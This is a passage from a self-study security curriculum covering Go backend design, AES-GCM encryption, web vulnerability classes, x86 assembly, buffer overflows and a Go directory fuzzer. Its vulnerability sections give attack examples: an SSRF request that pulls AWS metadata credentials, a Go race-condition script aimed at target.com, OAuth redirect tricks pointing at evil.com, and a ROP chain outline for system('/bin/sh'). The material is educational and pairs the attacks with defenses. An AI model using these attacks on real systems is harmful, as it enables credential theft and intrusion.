Best for: Write-heavy workloads

Page-Oriented (B-Tree) — e.g., PostgreSQL, MySQL
Write path: Find page → modify in-place → write-ahead log (WAL) for durability
Read path: Traverse B-tree from root to leaf
Best for: Read-heavy workloads, range queries
```

**PostgreSQL uses a B-tree.** When you run `SELECT * FROM files WHERE user_id = 42`, PostgreSQL traverses a B-tree index on `user_id` to find the matching rows. Without the index, it scans every row in the table. **This is why you create indexes.** You will know this because you read Chapter 3, not because a tutorial told you to add `CREATE INDEX`.

**Chapter 5 — Replication:**
Master-slave replication, replication lag, read-your-writes consistency. This becomes relevant in Phase 4 when you reason about race conditions in your live system — if a write hasn't replicated yet and a read happens, what does the user see?

---

### MONTH 4, WEEK 2–4: Go — The Language of Your Backend

**Install the canonical reference:**
```bash
# Read "The Go Programming Language" by Donovan & Kernighan
# Chapters 1-5 before writing production Go
```

**Go's mental model vs. C and TypeScript:**

```
C:           Manual memory management. You control every byte.
TypeScript:  Garbage collected. You describe types; V8 manages memory.
Go:          Garbage collected, but with explicit concurrency primitives
             (goroutines, channels). You don't manage memory, but you 
             manage concurrent state explicitly.
```

**The five Go concepts you must master before Phase 2 builds:**

#### 1. Goroutines — Not Threads

```go
// A goroutine is a lightweight, cooperatively-scheduled execution unit.
// The Go runtime multiplexes thousands of goroutines onto OS threads.

go func() {
    // This runs concurrently
    fmt.Println("running in a goroutine")
}()

// Compare to Phase 1 pthreads:
// pthread_create() creates an OS thread — expensive (1MB+ stack, OS scheduling)
// go func(){}() creates a goroutine — cheap (2KB initial stack, Go scheduler)

// Your Phase 3 concurrent fuzzer will launch hundreds of goroutines.
// In C, that would require hundreds of OS threads. In Go, it's trivial.
```

#### 2. Channels — Safe Communication Between Goroutines

```go
// The race condition you saw in your C server's accept loop?
// Go channels prevent that class of bug:

results := make(chan string, 100)  // Buffered channel

go func() {
    results <- "scan result 1"   // Send
}()

result := <-results              // Receive (blocks until data available)
```

#### 3. The `context` Package — Request Lifecycle Management

```go
// Every HTTP handler in your Go API receives a context.
// Context carries deadlines, cancellation signals, and request-scoped values.

func (h *Handler) GetFile(w http.ResponseWriter, r *http.Request) {
    ctx := r.Context()  // Get request context
    
    // Database query respects cancellation:
    // If client disconnects, ctx is cancelled, query stops.
    row, err := h.db.QueryRowContext(ctx, "SELECT * FROM files WHERE id = $1", fileID)
    
    // Why this matters for security: 
    // Without context, a slow query holds a DB connection indefinitely.
    // This is exploitable as a resource exhaustion attack.
}
```

#### 4. Error Handling — The Go Way

```go
// Go has no exceptions. Errors are values returned explicitly.
// This is verbose but forces you to handle every failure path.

file, err := os.Open(filename)
if err != nil {
    // Handle it. You cannot ignore this and continue.
    return fmt.Errorf("opening file %s: %w", filename, err)
}
defer file.Close()  // defer: runs when function returns, even on error

// Why this matters for your C background:
// In C, you checked errno and return codes manually.
// Go formalizes this pattern. Same philosophy, enforced by the type system.
```

#### 5. Interfaces — Duck Typing with Type Safety

```go
// In Go, a type implements an interface implicitly.
// If it has the right methods, it satisfies the interface.

type Storage interface {
    StoreFile(ctx context.Context, file []byte) (string, error)
    GetFile(ctx context.Context, id string) ([]byte, error)
}

// Your SecureDrop clone will have a PostgreSQL implementation:
type PostgresStorage struct { db *pgxpool.Pool }

// And a mock implementation for testing:
type MockStorage struct { files map[string][]byte }

// Both satisfy Storage. Your handlers depend on Storage, not PostgresStorage.
// This is how you write testable Go.
```

---

### MONTH 4–5: THE DATABASE LAYER — PostgreSQL AND REDIS

**PostgreSQL schema for SecureDrop clone:**

```sql
-- Run this in psql or via a migration tool (golang-migrate)

CREATE EXTENSION IF NOT EXISTS "uuid-ossp";

CREATE TABLE users (
    id          UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
    email       TEXT UNIQUE NOT NULL,
    -- NEVER store plaintext passwords. NEVER.
    -- argon2id hash:
    password_hash TEXT NOT NULL,
    created_at  TIMESTAMPTZ DEFAULT NOW(),
    updated_at  TIMESTAMPTZ DEFAULT NOW()
);

CREATE TABLE files (
    id              UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
    owner_id        UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE,
    filename        TEXT NOT NULL,
    -- The actual encrypted bytes are stored in object storage or filesystem.
    -- The DB stores metadata and the encryption parameters.
    size_bytes      BIGINT NOT NULL,
    -- AES-GCM encryption parameters (stored per-file):
    iv              BYTEA NOT NULL,  -- 12 bytes for AES-GCM
    -- The encrypted file key (key is encrypted with user's derived master key)
    encrypted_key   BYTEA NOT NULL,
    created_at      TIMESTAMPTZ DEFAULT NOW()
);

-- Index for fast lookup of a user's files:
CREATE INDEX idx_files_owner_id ON files(owner_id);

-- Audit log — every file access is recorded:
CREATE TABLE access_log (
    id          BIGSERIAL PRIMARY KEY,
    file_id     UUID REFERENCES files(id),
    user_id     UUID REFERENCES users(id),
    action      TEXT NOT NULL,  -- 'upload', 'download', 'delete'
    ip_address  INET,
    accessed_at TIMESTAMPTZ DEFAULT NOW()
);
```

**Why this schema makes security sense:**
- `iv` is stored per file: AES-GCM nonce never reused across files
- `encrypted_key` is stored per file: If the storage backend is breached, encrypted file keys without the user's master key are useless
- `access_log`: Complete audit trail for incident response
- `ON DELETE CASCADE`: Deleting a user deletes their files — no orphaned encrypted blobs

**Redis — what you use it for in this project:**

```
PostgreSQL:
  - Persistent data (users, files, access_log)
  - Source of truth
  - Transactional (ACID)

Redis:
  - Session tokens (expire after inactivity)
  - Rate limiting counters (prevent brute force)
  - Upload job queues (async processing)
  - NOT for persistent data you can't lose
```

```go
// Redis session example:
func (s *SessionStore) Create(ctx context.Context, userID string) (string, error) {
    token := generateSecureToken(32)  // crypto/rand, not math/rand
    
    key := "session:" + token
    err := s.client.Set(ctx, key, userID, 24*time.Hour).Err()
    if err != nil {
        return "", fmt.Errorf("creating session: %w", err)
    }
    return token, nil
}

func (s *SessionStore) Validate(ctx context.Context, token string) (string, error) {
    key := "session:" + token
    userID, err := s.client.Get(ctx, key).Result()
    if err == redis.Nil {
        return "", ErrInvalidSession
    }
    return userID, err
}
```

---

### MONTH 5: AES-GCM-256 — THE CRYPTOGRAPHIC CORE

**Read *"Real-World Cryptography"* by David Wong, Chapters 1–3, before implementing any of this.**

AES-GCM (Galois/Counter Mode) is authenticated encryption — it provides both **confidentiality** (encrypted data cannot be read) and **authenticity** (encrypted data cannot be tampered with undetected).

**The parameters:**
```
Key:  256 bits (32 bytes) — the secret. Derived from user password via PBKDF2/Argon2.
IV:   96 bits  (12 bytes) — the nonce. Must be unique per encryption operation.
Tag:  128 bits (16 bytes) — the authentication tag. Verifies integrity on decrypt.
```

**The IV is the most dangerous parameter.** AES-GCM uses CTR mode under the hood. CTR mode XORs the keystream with plaintext. If you encrypt two different plaintexts with the same key AND the same IV, an attacker can XOR the two ciphertexts together and cancel the keystream — recovering information about both plaintexts. This is catastrophic.

```go
// WRONG: Deterministic IV generation
iv := make([]byte, 12)
copy(iv, []byte("file"+fileID))  // NEVER do this. Predictable = reusable.

// CORRECT: Cryptographically random IV per encryption:
iv := make([]byte, 12)
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
    return nil, fmt.Errorf("generating IV: %w", err)
}
// Store iv alongside ciphertext. It is NOT secret — it just must be unique.
```

**Complete AES-GCM-256 encryption in Go:**

```go
package crypto

import (
    "crypto/aes"
    "crypto/cipher"
    "crypto/rand"
    "fmt"
    "io"
)

// EncryptFile encrypts plaintext with AES-GCM-256.
// Returns: ciphertext || tag (GCM appends the tag automatically)
// The IV is returned separately — store it with the ciphertext.
func EncryptFile(key []byte, plaintext []byte) (ciphertext []byte, iv []byte, err error) {
    if len(key) != 32 {
        return nil, nil, fmt.Errorf("key must be 32 bytes, got %d", len(key))
    }

    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, nil, fmt.Errorf("creating cipher: %w", err)
    }

    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return nil, nil, fmt.Errorf("creating GCM: %w", err)
    }

    // Generate cryptographically random nonce
    iv = make([]byte, gcm.NonceSize())  // 12 bytes for standard GCM
    if _, err := io.ReadFull(rand.Reader, iv); err != nil {
        return nil, nil, fmt.Errorf("generating nonce: %w", err)
    }

    // Seal encrypts and appends authentication tag
    // Signature: Seal(dst, nonce, plaintext, additionalData)
    ciphertext = gcm.Seal(nil, iv, plaintext, nil)
    // ciphertext is now: encrypted_content || 16-byte_auth_tag
    
    return ciphertext, iv, nil
}

func DecryptFile(key []byte, ciphertext []byte, iv []byte) ([]byte, error) {
    if len(key) != 32 {
        return nil, fmt.Errorf("key must be 32 bytes")
    }

    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, fmt.Errorf("creating cipher: %w", err)
    }

    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return nil, fmt.Errorf("creating GCM: %w", err)
    }

    // Open decrypts AND verifies the authentication tag
    // If the ciphertext was tampered with, this returns an error.
    plaintext, err := gcm.Open(nil, iv, ciphertext, nil)
    if err != nil {
        // Important: do NOT expose whether decryption failed due to wrong key
        // vs. tampered data. Return a generic error.
        return nil, fmt.Errorf("decryption failed")
    }

    return plaintext, nil
}
```

**Key derivation from password using Argon2id:**

```go
import "golang.org/x/crypto/argon2"

func DeriveKey(password string, salt []byte) []byte {
    // Argon2id parameters (OWASP recommended minimums):
    // time=1, memory=64MB, threads=4, keyLen=32
    return argon2.IDKey(
        []byte(password), 
        salt,
        1,       // time (iterations)
        64*1024, // memory in KiB (64MB)
        4,       // parallelism
        32,      // output key length (256-bit for AES-256)
    )
}
```

---

### MONTH 5–6: SECURITY BLOCK — ADVANCED VULNERABILITY CLASSES

#### SSRF — Server-Side Request Forgery: The Mechanism

**The mechanism:** An attacker causes the server to make HTTP requests to an arbitrary destination on their behalf, using the server's network identity and trust relationships.

```
Normal flow:
Browser ──▶ Server ──▶ Database/API

SSRF flow:
Browser ──▶ Server ──▶ http://169.254.169.254/   (AWS metadata endpoint)
                   ──▶ http://localhost:6379/      (Redis, internal only)
                   ──▶ http://10.0.0.5/admin       (Internal admin panel)
```

**Vulnerable code pattern:**

```python
# Application allows users to specify a URL to fetch (e.g., avatar image URL):
@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)   # NO VALIDATION. Classic SSRF.
    return response.content
```

**Attack against AWS EC2 instance:**
```
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

The EC2 instance's IAM role credentials are returned. An attacker now has AWS API keys.

**The defense:** Validate and sanitize the URL. Block private IP ranges, localhost, and internal hostnames. Use DNS resolution to detect blind SSRF bypass attempts (e.g., attacker controls DNS for `evil.com → 169.254.169.254`).

**In your SecureDrop clone context:** Your file upload endpoint must not follow redirects or fetch URLs. If you add a "fetch file from URL" feature, every line of the URL handling code is a potential SSRF surface.

#### Race Conditions — The Mechanism

**The mechanism:** A system performs a check and then an action based on that check, but the state can change between the check and the action (Time-of-Check to Time-of-Use, TOCTOU).

```
Vulnerable flow:
1. Check: user has enough credits (credits = 100)
2. [100ms gap — server processes request]
3. Action: deduct credits (credits = credits - 100 = 0)

Attack (send 10 simultaneous requests):
10 threads all reach step 1 at the same time.
All 10 see credits = 100.
All 10 pass the check.
All 10 execute step 3.
Result: credits = 100 - (10 * 100) = -900. User spent 10x for the price of 1.
```

**Exploit with Go (as the attacker):**

```go
package main

import (
    "fmt"
    "net/http"
    "sync"
)

func main() {
    var wg sync.WaitGroup
    results := make(chan string, 10)
    
    // Launch 10 simultaneous requests
    for i := 0; i < 10; i++ {
        wg.Add(1)
        go func(id int) {
            defer wg.Done()
            resp, err := http.Get("http://target.com/redeem-coupon?code=SAVE100")
            if err != nil {
                results <- fmt.Sprintf("goroutine %d: error: %v", id, err)
                return
            }
            defer resp.Body.Close()
            results <- fmt.Sprintf("goroutine %d: %d", id, resp.StatusCode)
        }(i)
    }
    
    go func() {
        wg.Wait()
        close(results)
    }()
    
    for r := range results {
        fmt.Println(r)
    }
}
```

**The defense (database-level atomic operation):**

```sql
-- WRONG: check then act (two separate queries — race condition):
SELECT credits FROM accounts WHERE id = $1;  -- check
UPDATE accounts SET credits = credits - 100 WHERE id = $1;  -- act

-- CORRECT: atomic update with condition:
UPDATE accounts 
SET credits = credits - 100 
WHERE id = $1 AND credits >= 100
RETURNING credits;
-- If credits was already < 100, no row is updated. Zero race condition.
```

In your SecureDrop clone, file upload quotas, rate limiting, and any credit-based feature must use atomic database operations.

#### OAuth 2.0 Flaws — The Mechanism

OAuth 2.0 is the protocol behind "Login with Google/GitHub/Facebook." Its complexity creates several common implementation vulnerabilities.

**The `state` parameter CSRF:**

```
OAuth flow:
1. User clicks "Login with GitHub"
2. Server generates random state: state = "a3f9k2"
3. Redirect to: https://github.com/login/oauth/authorize?client_id=...&state=a3f9k2
4. User authenticates with GitHub
5. GitHub redirects back: https://yourapp.com/callback?code=AUTH_CODE&state=a3f9k2
6. Server verifies state matches what it generated
7. Server exchanges code for access token

CSRF Attack (missing state validation):
1. Attacker initiates OAuth, gets to step 3
2. Attacker does NOT authenticate — saves the redirect URL
3. Attacker tricks victim into clicking: https://yourapp.com/callback?code=ATTACKER_CODE
4. Victim's browser sends callback with attacker's code
5. Victim's account gets linked to attacker's GitHub → account takeover
```

**The `redirect_uri` manipulation:**

```
Legitimate redirect:
https://yourapp.com/auth/callback

Attacker modifies redirect_uri:
https://yourapp.com/auth/callback%20https://evil.com

Depending on how the OAuth server validates URIs:
- Some allow open redirects (sends code to evil.com)
- Some allow subdomain additions
- Some validate prefix only (yourapp.com.evil.com bypasses prefix check)
```

This entire class is testable in PortSwigger's OAuth lab series. Study each mechanism before hitting the labs.

---

# PHASE 2 → PHASE 3 CONNECTION MAP

```
AES-GCM encryption implementation (Phase 2)
    ↓
Deep understanding of how encryption parameters (IV, key, tag) are structured in memory
    ↓
Phase 3: When you reverse engineer a binary in Ghidra, you will find encryption routines.
You will recognize AES-GCM because you implemented it. You'll spot nonce reuse in 
someone else's code immediately.

Race condition understanding (Phase 2 PortSwigger)
    ↓
Visceral understanding of TOCTOU and concurrent state
    ↓
Phase 3: Binary exploitation involves timing attacks. Heap exploitation uses 
concurrent allocation/free sequences. The mental model is the same.

Go concurrency (goroutines, channels) (Phase 2 backend)
    ↓
Ability to write correct concurrent code with channels
    ↓
Phase 3: Your Vigilante fuzzer uses goroutines to send thousands of concurrent 
HTTP requests. The concurrency model you built in Phase 2 is directly deployed here.

PostgreSQL B-tree + indexing (Phase 2, DDIA)
    ↓
Understanding of how databases organize data in ordered tree structures
    ↓
Phase 3: Binary exploitation often targets heap allocators (ptmalloc, tcache).
Heap allocators also use tree structures (bin lists, free lists). Same organizing principle.
```

---
---

# PHASE 3: MONTHS 7–9 — EXPLOIT ENGINEERING & RECON AUTOMATION
## *Assembly, Binary Exploitation, and Custom Tooling*

---

## THE CENTRAL THESIS OF PHASE 3

> **Software is just data. Executable data, but data.** A compiled binary is bytes in a file. When the CPU executes it, those bytes become electrical signals in silicon. An exploit is bytes that cause the CPU to execute *different* data than the programmer intended. Phase 3 teaches you to read programs at the byte level, understand how memory is corrupted, and build tools that move at machine speed.

---

### MONTH 7, WEEK 1–2: x86_64 ASSEMBLY — THE MACHINE'S LANGUAGE

**The register file — memorize this:**

```
64-bit   32-bit   16-bit   8-bit(high)  8-bit(low)   Purpose
────────────────────────────────────────────────────────────────
RAX      EAX      AX       AH           AL           Accumulator, return value
RBX      EBX      BX       BH           BL           Base, callee-saved
RCX      ECX      CX       CH           CL           Counter (loops, shifts)
RDX      EDX      DX       DH           DL           Data, I/O
RSI      ESI      SI                    SIL          Source index (string ops)
RDI      EDI      DI                    DIL          Destination index, arg 1
RSP      ESP      SP                    SPL          Stack pointer
RBP      EBP      BP                    BPL          Base pointer (frame)
RIP      EIP      IP                                 Instruction pointer
R8–R15   R8D-R15D R8W-R15W             R8B-R15B     Additional registers
```

**The System V AMD64 calling convention (Linux x86_64) — critical for exploit development:**

```
Function arguments are passed in registers in this order:
  Argument 1: RDI
  Argument 2: RSI
  Argument 3: RDX
  Argument 4: RCX
  Argument 5: R8
  Argument 6: R9
  Arguments 7+: pushed onto the stack (right to left)

Return value: RAX (and RDX for 128-bit returns)
Caller-saved (you can trash these): RAX, RCX, RDX, RSI, RDI, R8, R9, R10, R11
Callee-saved (you must preserve): RBX, RBP, R12, R13, R14, R15
```

**Why this matters for exploitation:** When you overflow a buffer and overwrite the return address, you're redirecting execution. If you want to call `system("/bin/sh")`, you need `RDI = pointer to "/bin/sh"` before the `call system` instruction. In ROP chains, you search for gadgets that put the right value in RDI. You need to know the calling convention to construct valid ROP chains.

**Practical NASM walkthrough — write and run your first assembly program:**

```nasm
; hello.asm — print "Hello" using write() syscall
section .data
    msg db "Hello, Assembly!", 0x0a  ; string + newline
    msg_len equ $ - msg              ; length calculated at assembly time

section .text
    global _start

_start:
    ; sys_write(fd=1, buf=msg, count=msg_len)
    ; Linux syscall number for write: 1
    mov rax, 1          ; syscall number: write
    mov rdi, 1          ; arg1: file descriptor 1 (stdout)
    mov rsi, msg        ; arg2: pointer to message
    mov rdx, msg_len    ; arg3: message length
    syscall             ; invoke kernel

    ; sys_exit(code=0)
    mov rax, 60         ; syscall number: exit
    mov rdi, 0          ; arg1: exit code
    syscall
```

```bash
nasm -f elf64 hello.asm -o hello.o
ld hello.o -o hello
./hello

# Disassemble your own binary:
objdump -d -M intel hello
```

**Compare the disassembly to your source.** Every instruction is exactly where you put it. This is what Ghidra will show you for unknown binaries — except without the labels.

---

### MONTH 7, WEEK 2–4: THE STACK FRAME — THE ANATOMY OF EXPLOITATION

**A function call at the assembly level:**

```c
// C source:
int add(int a, int b) {
    int result = a + b;
    return result;
}

int main() {
    int z = add(3, 4);
    return z;
}
```

**What the CPU actually does when `add(3, 4)` is called:**

```
In main(), before call:
  1. mov edi, 3          ; arg1 (a) → RDI (32-bit: EDI)
  2. mov esi, 4          ; arg2 (b) → RSI (32-bit: ESI)
  3. call add            ; push RIP+next_instruction onto stack, jump to add

In add(), the prologue:
  4. push rbp            ; save caller's base pointer onto stack
  5. mov rbp, rsp        ; set new base pointer = current stack pointer

Stack now looks like:
  [RBP]     ← RSP points here (current frame base)
  [RBP+8]   ← saved RBP (caller's frame)
  [RBP+16]  ← return address (where to go when add() returns)
  
  6. sub rsp, 16         ; allocate space for local variable (result)

  7. mov [rbp-4], edi    ; store arg a into local space
  8. mov [rbp-8], esi    ; store arg b into local space
  9. mov eax, [rbp-4]
  10. add eax, [rbp-8]   ; eax = a + b
  11. mov [rbp-12], eax  ; result = eax

The epilogue:
  12. mov eax, [rbp-12]  ; return value → RAX
  13. leave              ; mov rsp, rbp; pop rbp  (restore caller's frame)
  14. ret                ; pop return address → RIP (jump back to caller)
```

**The buffer overflow — where the stack corruption happens:**

```c
// vulnerable.c
#include <string.h>

void vuln(char *input) {
    char buffer[64];           // 64 bytes allocated on stack
    strcpy(buffer, input);     // strcpy has NO bounds check
    // If input > 64 bytes: overflows into saved RBP, then return address
}

int main(int argc, char **argv) {
    vuln(argv[1]);
    return 0;
}
```

```
Stack layout in vuln():
  [buffer: 64 bytes]  ← RSP (grows upward toward RBP)
  [saved RBP: 8 bytes]
  [return address: 8 bytes]  ← RIP will jump here when ret executes
  [main's stack frame]
```

If you send 64 bytes to fill the buffer, then 8 more bytes to overwrite the saved RBP, then 8 bytes to overwrite the return address — the CPU will jump to whatever 64-bit address those 8 bytes represent.

**GDB session to observe the overflow:**

```bash
gcc -g -fno-stack-protector -no-pie -o vulnerable vulnerable.c
gdb ./vulnerable
(gdb) break vuln
(gdb) run $(python3 -c "print('A'*80)")
(gdb) x/20gx $rsp         # See the A's (0x41) filling the buffer and beyond
(gdb) info frame           # See the corrupted saved RBP and return address
(gdb) continue             # Watch it crash with SIGSEGV — invalid address 0x4141414141414141
```

**The 0x4141414141414141 address is "AAAAAAAA" in ASCII hex.** You controlled the return address. This is the foundation of every binary exploit.

---

### MONTH 8: GHIDRA — READING BINARIES YOU DIDN'T WRITE

Ghidra is a reverse engineering framework developed by the NSA and released as open source. It decompiles compiled binaries back to pseudo-C code.

**Setup:**
```bash
# Download from ghidra-sre.org
# Requires Java 17+
sudo apt install openjdk-17-jdk
# Extract and run ghidraRun
```

**The Ghidra workflow for a crackme:**

A "crackme" is a small compiled binary that asks for a password. Your task: find the password without being told it.

```
Step 1: File → New Project → Import binary
Step 2: Double-click to analyze (accept defaults)
Step 3: Go to main() in the Symbol Tree
Step 4: Read the decompiled output in the Decompiler window
Step 5: Identify the comparison logic
Step 6: Find the correct input
```

**Example Ghidra decompiler output:**

```c
// What Ghidra shows you (cleaned up):
int main(void) {
    char input[64];
    printf("Enter password: ");
    fgets(input, 64, stdin);
    input[strcspn(input, "\n")] = 0;  // strip newline
    
    if (strcmp(input, "s3cr3t_p4ss") == 0) {
        puts("Access granted!");
    } else {
        puts("Wrong password.");
    }
    return 0;
}
```

The password is `s3cr3t_p4ss`. Trivial example, but the skill is in reading the decompiler output for obfuscated code.

**Real crackme techniques:**

```
Level 1: Strings analysis
  strings ./binary | grep -i pass
  → Sometimes the password is just a plaintext string in the binary

Level 2: Dynamic analysis
  ltrace ./binary < input.txt
  → ltrace shows library calls: strcmp("yourguess", "correctpass")

Level 3: Static analysis in Ghidra
  → Find the comparison function, trace back where the expected value comes from
  → Sometimes it's computed: expected = hash(username) or expected = transform(serial)

Level 4: Anti-analysis techniques
  → Binary packed with UPX (use upx -d to unpack first)
  → strcmp replaced with custom comparison loop
  → Time-based checks (debugger detection)
```

---

### MONTH 8–9: MODERN BINARY SECURITY CONTROLS AND BYPASSES

Modern Linux binaries don't just have buffer overflows that directly redirect execution. They have defenses:

**1. Stack Canaries**

```
Stack layout WITH canary:
  [buffer: 64 bytes]
  [canary: 8 bytes]   ← Random value placed here at function entry
  [saved RBP: 8 bytes]
  [return address: 8 bytes]

Before returning, the compiler inserts:
  mov rax, [rbp-8]    ; load canary
  xor rax, gs:0x28    ; compare to stored value (thread-local storage)
  jne __stack_chk_fail ; if different, someone overwrote it → crash
```

**Bypass:** Format string vulnerability to leak the canary value, then include it in your overflow payload.

**2. ASLR (Address Space Layout Randomization)**

```
Without ASLR:
  Stack always at:   0x7fffffffdc00
  libc always at:    0x7ffff7a00000

With ASLR (enabled by default on Linux):
  Stack this run:    0x7ffd3a2c1b40  (random)
  Stack next run:    0x7f8e9bc34110  (different random)
```

**Bypass:** Information leak vulnerability — find a way to print a pointer that reveals the current randomized base address.

**3. NX Bit (Non-Executable Stack)**

```
Without NX: You inject shellcode into the buffer and jump to it.
With NX:    The stack is marked non-executable. If RIP points to the stack → SIGILL/SIGSEGV.
```

**Bypass: Return-Oriented Programming (ROP)**

```
Instead of injecting code, you chain together existing code snippets ("gadgets") 
that already exist in the binary or libc.

A gadget is a sequence of instructions ending in RET:
  pop rdi ; ret
  pop rsi ; ret
  pop rdx ; ret

ROP chain to call system("/bin/sh"):
  [address of: pop rdi; ret]    ← overwrites return address
  [address of "/bin/sh" string] ← popped into RDI (arg1)
  [address of: system()]        ← called with RDI = "/bin/sh"

Each gadget pops something useful, then RETs to the next gadget.
The stack becomes a program. ROP is Turing-complete.
```

**Tool: ROPgadget**
```bash
pip3 install ropgadget
ROPgadget --binary ./vulnerable --rop
# Lists all usable gadgets and their addresses
```

---

### MONTH 9: THE VIGILANTE FUZZER — PHASE 3 CAPSTONE

**Architecture:**

```
vigilante/
├── cmd/
│   └── vigilante/
│       └── main.go          // CLI entry point (cobra)
├── internal/
│   ├── runner/
│   │   └── runner.go        // Orchestrates scan jobs
│   ├── scanner/
│   │   └── http.go          // Concurrent HTTP request engine
│   ├── dns/
│   │   └── resolver.go      // Concurrent DNS resolution
│   ├── wordlist/
│   │   └── parser.go        // Wordlist loading and streaming
│   ├── filter/
│   │   └── filter.go        // Response filtering (status codes, regex, size)
│   └── output/
│       └── reporter.go      // HTML/CSV report generation
├── go.mod
└── README.md
```

**The core scanner — concurrency model:**

```go
// internal/scanner/http.go
package scanner

import (
    "context"
    "fmt"
    "net/http"
    "sync"
    "time"
)

type Result struct {
    URL        string
    StatusCode int
    BodySize   int64
    Duration   time.Duration
    Error      error
}

type Scanner struct {
    client      *http.Client
    concurrency int
    results     chan Result
}

func New(concurrency int, timeout time.Duration) *Scanner {
    return &Scanner{
        client: &http.Client{
            Timeout: timeout,
            // Don't follow redirects — we want to see the 301/302 itself
            CheckRedirect: func(req *http.Request, via []*http.Request) error {
                return http.ErrUseLastResponse
            },
        },
        concurrency: concurrency,
        results:     make(chan Result, concurrency*2),
    }
}

// Scan takes a target URL and a channel of paths to fuzz.
// It launches [concurrency] goroutines to probe each path.
func (s *Scanner) Scan(ctx context.Context, baseURL string, paths <-chan string) <-chan Result {
    results := make(chan Result, s.concurrency)
    
    var wg sync.WaitGroup
    
    // Launch worker pool
    for i := 0; i < s.concurrency; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            for path := range paths {
                // Check context cancellation (Ctrl+C)
                select {
                case <-ctx.Done():
                    return
                default:
                }
                
                result := s.probe(baseURL + path)
                
                select {
                case results <- result:
                case <-ctx.Done():
                    return
                }
            }
        }()
    }
    
    // Close results when all workers are done
    go func() {
        wg.Wait()
        close(results)
    }()
    
    return results
}

func (s *Scanner) probe(url string) Result {
    start := time.Now()
    
    req, err := http.NewRequest(http.MethodGet, url, nil)
    if err != nil {
        return Result{URL: url, Error: fmt.Errorf("creating request: %w", err)}
    }
    req.Header.Set("User-Agent", "Vigilante/1.0")
    
    resp, err := s.client.Do(req)
    if err != nil {
        return Result{URL: url, Duration: time.Since(start), Error: err}
    }
    defer resp.Body.Close()
    
    return Result{
        URL:        url,
        StatusCode: resp.StatusCode,
        BodySize:   resp.ContentLength,
        Duration:   time.Since(start),
    }
}
```

**Benchmark against `ffuf`:** After building Vigilante, test it:
```bash
# Run ffuf against a target:
time ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
          -u http://target.com/FUZZ -t 50

# Run Vigilante:
time ./vigilante dir -u http://target.com -w /usr/share/wordlists/... -t 50

# Compare: requests/second, accuracy, memory usage
go tool pprof (profile your binary for bottlenecks)
```

---

# PHASE 3 → PHASE 4 CONNECTION MAP

```
GDB stack frame analysis (Phase 3)
    ↓
Deep understanding of how the kernel manages process memory
    ↓
Phase 4: Writing a Linux Kernel Module means operating IN kernel space.
The memory model you understand from Phase 1/3 userspace applies to kernel space,
but with different consequences: a mistake doesn't crash a process, it panics the system.

ROP chain construction (Phase 3)
    ↓
Understanding of how to chain code execution through existing binary primitives
    ↓
Phase 4 Bug Bounty: Real vulnerabilities are rarely isolated. Critical severity comes from
chaining — SSRF to access internal metadata → credentials → full account takeover.
The "chain" mental model from ROP applies directly.

Vigilante Go fuzzer (Phase 3 capstone)
    ↓
Production-grade concurrent Go codebase
    ↓
Phase 4: Your recon for live bug bounty runs Vigilante. You are using your own tool
on real targets. Every bug in Vigilante costs you accuracy. Fix them before Phase 4.

Ghidra binary analysis (Phase 3)
    ↓
Ability to read compiled code without source
    ↓
Phase 4: When you find a bug in a live program, sometimes you get a crash report
and a binary. Reverse engineering tells you what the binary does without the source.
```

---
---

# PHASE 4: MONTHS 10–12 — THE SOVEREIGN HACKER
## *Live Infrastructure, Kernel Engineering, and Real-World Vulnerability Discovery*

---

## THE CENTRAL THESIS OF PHASE 4

> **Everything you built, you can now deploy. Everything you know, you can now weaponize.** Phase 4 is the integration phase. Your C knowledge builds a kernel module. Your Go knowledge runs production infrastructure. Your security knowledge hunts real bugs in real systems. The split between creator and hacker dissolves. They were always the same discipline.

---

### MONTH 10, WEEK 1–2: OPERATING SYSTEMS: THREE EASY PIECES (OSTEP)

**Read with this frame:** You have been using operating system services for 9 months — `fork`, `mmap`, `pthread_create`, socket syscalls. OSTEP explains how those services are *implemented* inside the kernel you're about to write a module for.

**Chapter: Processes — The Abstraction**

```
A process is the OS's abstraction of a running program.

Process Control Block (PCB) — what the kernel stores per process:
  - PID (process ID)
  - Process state (running, ready, blocked, zombie)
  - Program counter (where is the CPU in this process's code?)
  - CPU registers (the complete register state — saved/restored on context switch)
  - Memory maps (where is this process's code, heap, stack?)
  - Open file descriptors
  - Signal handlers
  - Parent PID
```

**The process state machine:**
```
Created → Ready ⇌ Running → Terminated
               ↕
           Blocked (waiting for I/O)
```

**Context switching** — how the OS multiplexes the CPU:
```
1. Timer interrupt fires (every ~4ms)
2. CPU saves current process's registers to its PCB
3. Scheduler selects next process
4. CPU loads next process's registers from its PCB
5. Jump to next process's saved program counter
```

This is why concurrency bugs (race conditions, deadlocks) are hard: the context switch can happen at any instruction.

**Chapter: Paging — The Mechanism**

```
Physical memory (RAM): actual silicon chips. One flat address space.
Virtual memory:       what each process sees. Each process thinks it owns all 64-bit memory.

The page table maps virtual addresses → physical addresses:
  Virtual addr: 0x7ffd3a2c1b40 (process's stack)
  Page table entry: virtual page 0x7ffd3a2c1 → physical frame 0x4F800
  Physical addr: 0x4F800B40

TLB (Translation Lookaside Buffer): cache for page table lookups.
  Every memory access requires an address translation.
  Without TLB: memory access is 2x slower (page table lookup + actual access).
  With TLB hit: translation is fast (cached).
```

**Why paging matters for security:**

ASLR works by randomizing the base address of each memory region — it changes which virtual page maps to which physical frame. Understanding paging explains *why* ASLR works and *why* information leaks defeat it (a leaked pointer reveals the virtual-to-physical mapping, undoing the randomization).

---

### MONTH 10, WEEK 3–4: LINUX KERNEL MODULE — SYSTEM CALL INTERCEPTION

**What a Kernel Module Is:**

A Linux Kernel Module (LKM) is compiled C code that is loaded into the running kernel. It runs with full kernel privileges — no MMU protection, no userspace isolation. A bug in an LKM panics the system or introduces a privilege escalation vulnerability.

```
Userspace:                    Kernel space:
─────────────────             ──────────────────────────────────────
Your program                  Linux kernel
  │                             │
